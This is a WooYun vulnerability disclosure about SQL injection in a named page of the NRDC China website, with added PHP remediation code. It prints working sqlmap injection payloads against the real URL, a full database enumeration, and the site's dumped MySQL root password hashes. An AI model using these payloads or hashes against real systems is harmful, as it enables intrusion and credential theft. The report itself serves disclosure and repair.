
Vulnerability Summary (24 followers)

Defect ID: wooyun-2014-056606

Title: SQL injection vulnerability in the Natural Resources Defense Council (China Program) website

Vendor: Natural Resources Defense Council (NRDC)

Author: bitcoin

Submitted: 2014-04-13 17:48

Fix time: 2014-05-28 17:49

Published: 2014-05-28 17:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2014-04-13: Details reported to the vendor; awaiting vendor handling
2014-04-18: Vendor confirmed; details visible to the vendor only
2014-04-28: Details disclosed to core white hats and relevant domain experts
2014-05-08: Details disclosed to regular white hats
2014-05-18: Details disclosed to intern white hats
2014-05-28: Details disclosed to the public

Brief description:

The Natural Resources Defense Council (China Program) website has a SQL injection vulnerability. NRDC, founded in 1970, is an independent non-profit international environmental protection organization. NRDC China has run environmental protection projects in China since 1995 and was the first international environmental organization to carry out clean energy and green building projects in China.

Detailed description:

Injection point:
http://www.nrdc.cn/our_program_flag.php?cid=256
The cid parameter is not strictly filtered before it reaches the database query. sqlmap output follows:
Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=256' AND 9612=9612 AND 'zLsb'='zLsb
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: cid=-2398' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7177706971,0x474b746a746f4b6b4a52,0x716b707971),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=256' AND SLEEP(5) AND 'dwxf'='dwxf
---
[23:37:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
[23:37:02] [INFO] fetching database names
[23:37:02] [INFO] the SQL query used returns 5 entries
[23:37:03] [INFO] retrieved: "information_schema"
[23:37:03] [INFO] retrieved: "mysql"
[23:37:03] [INFO] retrieved: "nrdc"
[23:37:04] [INFO] retrieved: "performance_schema"
[23:37:04] [INFO] retrieved: "test"
available databases [5]:
[*] information_schema
[*] mysql
[*] nrdc
[*] performance_schema
[*] test
Database: nrdc
[272 tables]
+---------------------------+
| blog_tou |
| ewp_13_commentmeta |
| ewp_13_comments |
| ewp_13_links |
| ewp_13_options |
| ewp_13_postmeta |
| ewp_13_posts |
| ewp_13_term_relationships |
| ewp_13_term_taxonomy |
| ewp_13_terms |
| ewp_14_commentmeta |
| ewp_14_comments |
| ewp_14_links |
| ewp_14_options |
| ewp_14_postmeta |
| ewp_14_posts |
| ewp_14_term_relationships |
| ewp_14_term_taxonomy |
| ewp_14_terms |
| ewp_15_commentmeta |
| ewp_15_comments |
| ewp_15_links |
| ewp_15_options |
| ewp_15_postmeta |
| ewp_15_posts |
| ewp_15_term_relationships |
| ewp_15_term_taxonomy |
| ewp_15_terms |
| ewp_16_commentmeta |
| ewp_16_comments |
| ewp_16_links |
| ewp_16_options |
| ewp_16_postmeta |
| ewp_16_posts |
| ewp_16_term_relationships |
| ewp_16_term_taxonomy |
| ewp_16_terms |
| ewp_17_commentmeta |
| ewp_17_comments |
| ewp_17_links |
| ewp_17_options |
| ewp_17_postmeta |
| ewp_17_posts |
| ewp_17_term_relationships |
| ewp_17_term_taxonomy |
| ewp_17_terms |
| ewp_2_commentmeta |
| ewp_2_comments |
| ewp_2_links |
| ewp_2_options |
| ewp_2_postmeta |
| ewp_2_posts |
| ewp_2_term_relationships |
| ewp_2_term_taxonomy |
| ewp_2_terms |
| ewp_3_commentmeta |
| ewp_3_comments |
| ewp_3_links |
| ewp_3_options |
| ewp_3_postmeta |
| ewp_3_posts |
| ewp_3_term_relationships |
| ewp_3_term_taxonomy |
| ewp_3_terms |
| ewp_4_commentmeta |
| ewp_4_comments |
| ewp_4_links |
| ewp_4_options |
| ewp_4_postmeta |
| ewp_4_posts |
| ewp_4_term_relationships |
| ewp_4_term_taxonomy |
| ewp_4_terms |
| ewp_5_commentmeta |
| ewp_5_comments |
| ewp_5_links |
| ewp_5_options |
| ewp_5_postmeta |
| ewp_5_posts |
| ewp_5_term_relationships |
| ewp_5_term_taxonomy |
| ewp_5_terms |
| ewp_6_commentmeta |
| ewp_6_comments |
| ewp_6_links |
| ewp_6_options |
| ewp_6_postmeta |
| ewp_6_posts |
| ewp_6_term_relationships |
| ewp_6_term_taxonomy |
| ewp_6_terms |
| ewp_7_commentmeta |
| ewp_7_comments |
| ewp_7_links |
| ewp_7_options |
| ewp_7_postmeta |
| ewp_7_posts |
| ewp_7_term_relationships |
| ewp_7_term_taxonomy |
| ewp_7_terms |
| ewp_8_commentmeta |
| ewp_8_comments |
| ewp_8_links |
| ewp_8_options |
| ewp_8_postmeta |
| ewp_8_posts |
| ewp_8_term_relationships |
| ewp_8_term_taxonomy |
| ewp_8_terms |
| ewp_blog_versions |
| ewp_blogs |
| ewp_commentmeta |
| ewp_comments |
| ewp_links |
| ewp_options |
| ewp_postmeta |
| ewp_posts |
| ewp_registration_log |
| ewp_signups |
| ewp_site |
| ewp_sitemeta |
| ewp_term_relationships |
| ewp_term_taxonomy |
| ewp_terms |
| ewp_usermeta |
| ewp_users |
| pc_a_down |
| pc_a_focus |
| pc_a_news |
| pc_a_newsfocus |
| pc_a_video |
| pc_admin |
| pc_application |
| pc_article |
| pc_attachment |
| pc_column |
| pc_faq |
| pc_log |
| pc_media_contact |
| pc_model |
| pc_model_field |
| pc_signup |
| pc_subscribe |
| pc_template |
| pc_volunteers |
| su_answer |
| su_ip |
| su_question |
| su_survey |
| wp_15_commentmeta |
| wp_15_comments |
| wp_15_links |
| wp_15_options |
| wp_15_postmeta |
| wp_15_posts |
| wp_15_term_relationships |
| wp_15_term_taxonomy |
| wp_15_terms |
| wp_16_commentmeta |
| wp_16_comments |
| wp_16_links |
| wp_16_options |
| wp_16_postmeta |
| wp_16_posts |
| wp_16_term_relationships |
| wp_16_term_taxonomy |
| wp_16_terms |
| wp_17_commentmeta |
| wp_17_comments |
| wp_17_links |
| wp_17_options |
| wp_17_postmeta |
| wp_17_posts |
| wp_17_term_relationships |
| wp_17_term_taxonomy |
| wp_17_terms |
| wp_19_commentmeta |
| wp_19_comments |
| wp_19_links |
| wp_19_options |
| wp_19_postmeta |
| wp_19_posts |
| wp_19_term_relationships |
| wp_19_term_taxonomy |
| wp_19_terms |
| wp_21_commentmeta |
| wp_21_comments |
| wp_21_links |
| wp_21_options |
| wp_21_postmeta |
| wp_21_posts |
| wp_21_postviews_plus |
| wp_21_term_relationships |
| wp_21_term_taxonomy |
| wp_21_terms |
| wp_23_commentmeta |
| wp_23_comments |
| wp_23_links |
| wp_23_options |
| wp_23_postmeta |
| wp_23_posts |
| wp_23_term_relationships |
| wp_23_term_taxonomy |
| wp_23_terms |
| wp_24_commentmeta |
| wp_24_comments |
| wp_24_links |
| wp_24_options |
| wp_24_postmeta |
| wp_24_posts |
| wp_24_term_relationships |
| wp_24_term_taxonomy |
| wp_24_terms |
| wp_25_commentmeta |
| wp_25_comments |
| wp_25_links |
| wp_25_options |
| wp_25_postmeta |
| wp_25_posts |
| wp_25_term_relationships |
| wp_25_term_taxonomy |
| wp_25_terms |
| wp_26_commentmeta |
| wp_26_comments |
| wp_26_links |
| wp_26_options |
| wp_26_postmeta |
| wp_26_posts |
| wp_26_term_relationships |
| wp_26_term_taxonomy |
| wp_26_terms |
| wp_27_commentmeta |
| wp_27_comments |
| wp_27_links |
| wp_27_options |
| wp_27_postmeta |
| wp_27_posts |
| wp_27_term_relationships |
| wp_27_term_taxonomy |
| wp_27_terms |
| wp_28_commentmeta |
| wp_28_comments |
| wp_28_links |
| wp_28_options |
| wp_28_postmeta |
| wp_28_posts |
| wp_28_term_relationships |
| wp_28_term_taxonomy |
| wp_28_terms |
| wp_29_commentmeta |
| wp_29_comments |
| wp_29_links |
| wp_29_options |
| wp_29_postmeta |
| wp_29_posts |
| wp_29_term_relationships |
| wp_29_term_taxonomy |
| wp_29_terms |
| wp_30_commentmeta |
| wp_30_comments |
| wp_30_links |
| wp_30_options |
| wp_30_postmeta |
| wp_30_posts |
| wp_30_postviews_plus |
| wp_30_term_relationships |
| wp_30_term_taxonomy |
| wp_30_terms |
| wp_31_commentmeta |
| wp_31_comments |
| wp_31_links |
| wp_31_options |
.......
Database: mysql
[24 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+
Database: mysql
Table: user
[42 columns]
+------------------------+-----------------------------------+
| Column | Type |
+------------------------+-----------------------------------+
| User | char(16) |
| Alter_priv | enum('N','Y') |
| Alter_routine_priv | enum('N','Y') |
| authentication_string | text |
| Create_priv | enum('N','Y') |
| Create_routine_priv | enum('N','Y') |
| Create_tablespace_priv | enum('N','Y') |
| Create_tmp_table_priv | enum('N','Y') |
| Create_user_priv | enum('N','Y') |
| Create_view_priv | enum('N','Y') |
| Delete_priv | enum('N','Y') |
| Drop_priv | enum('N','Y') |
| Event_priv | enum('N','Y') |
| Execute_priv | enum('N','Y') |
| File_priv | enum('N','Y') |
| Grant_priv | enum('N','Y') |
| Host | char(60) |
| Index_priv | enum('N','Y') |
| Insert_priv | enum('N','Y') |
| Lock_tables_priv | enum('N','Y') |
| max_connections | int(11) unsigned |
| max_questions | int(11) unsigned |
| max_updates | int(11) unsigned |
| max_user_connections | int(11) unsigned |
| Password | char(41) |
| plugin | char(64) |
| Process_priv | enum('N','Y') |
| References_priv | enum('N','Y') |
| Reload_priv | enum('N','Y') |
| Repl_client_priv | enum('N','Y') |
| Repl_slave_priv | enum('N','Y') |
| Select_priv | enum('N','Y') |
| Show_db_priv | enum('N','Y') |
| Show_view_priv | enum('N','Y') |
| Shutdown_priv | enum('N','Y') |
| ssl_cipher | blob |
| ssl_type | enum('','ANY','X509','SPECIFIED') |
| Super_priv | enum('N','Y') |
| Trigger_priv | enum('N','Y') |
| Update_priv | enum('N','Y') |
| x509_issuer | blob |
| x509_subject | blob |
+------------------------+-----------------------------------+
Database: mysql
Table: user
[3 entries]
+--------+-------------------------------------------+
| User | Password |
+--------+-------------------------------------------+
| root | *26C53E6C886B01669876B6CF02CF6403E424B7E4 |
| root | *26C53E6C886B01669876B6CF02CF6403E424B7E4 |
| root | *26C53E6C886B01669876B6CF02CF6403E424B7E4 |
+--------+-------------------------------------------+

Proof of vulnerability:

As above.

Fix recommendation:

Filter the input.

Copyright notice: please credit the source when reposting: bitcoin@WooYun
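The report's fix is a single word, "filter", and its detail section says only that `cid` is not strictly filtered before reaching MySQL on a PHP 5.2 / Apache stack. The following is an added example, not code from the original report or from the nrdc.cn site, showing the pattern the report describes beside a hardened version: the parameter is validated as the integer it is supposed to be, and the query is sent as a prepared statement with a bound parameter. The table and column names (`program`, `id`, `title`, `body`), the database account `app_user`, and the DSN are assumptions for illustration; only the database name `nrdc` comes from the report.

```php
<?php
// Added example (not code from the original report or the affected site).
// Table/column names, the DSN and the DB account are assumptions.
declare(strict_types=1);

// --- Pattern described in the report: cid interpolated into the SQL text ---
// A quote character inside $cid becomes part of the SQL grammar, which is
// exactly what the boolean-, UNION- and time-based findings above exploit.
// Kept here only for comparison; do not deploy.
function fetchProgramVulnerable(PDO $db, string $cid): array
{
    $sql = "SELECT id, title, body FROM program WHERE id = '$cid'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened version ---
// 1. Validate the parameter against its expected type before it goes anywhere
//    near SQL. cid is a numeric column id, so anything other than a positive
//    integer is rejected outright (returns null).
function parseColumnId(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// 2. Use a server-side prepared statement with a typed bound parameter.
//    The query text and the value travel separately, so the value is never
//    parsed as SQL regardless of its content.
function fetchProgramSafe(PDO $db, int $cid): array
{
    $stmt = $db->prepare('SELECT id, title, body FROM program WHERE id = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Request handler for our_program_flag.php?cid=... ---
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=nrdc;charset=utf8mb4',
    'app_user',          // assumed low-privilege account, SELECT only on app tables
    'CHANGE_ME',         // placeholder; load the real secret from configuration
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Force real server-side prepares instead of client-side quoting.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

$cid = parseColumnId($_GET['cid'] ?? null);
if ($cid === null) {
    http_response_code(400);   // reject rather than "clean" malformed input
    exit('invalid cid');
}

$rows = fetchProgramSafe($db, $cid);
header('Content-Type: application/json');
echo json_encode($rows);
```

Two points beyond the filtering itself. First, the sqlmap run above was able to enumerate the `mysql` schema and dump `mysql.user`, which means the account the web application connects with had far more privilege than a content site needs; a dedicated account with SELECT on the application's own tables only would have limited what the injection could reach. Second, validation and parameterisation are complementary, not alternatives: the integer check rejects bad requests early and gives a clean 400 to log, while the bound parameter protects the query even if a later code change routes a different, less strictly checked value into it.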


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-04-18 09:44

Vendor reply:

Latest status:

None yet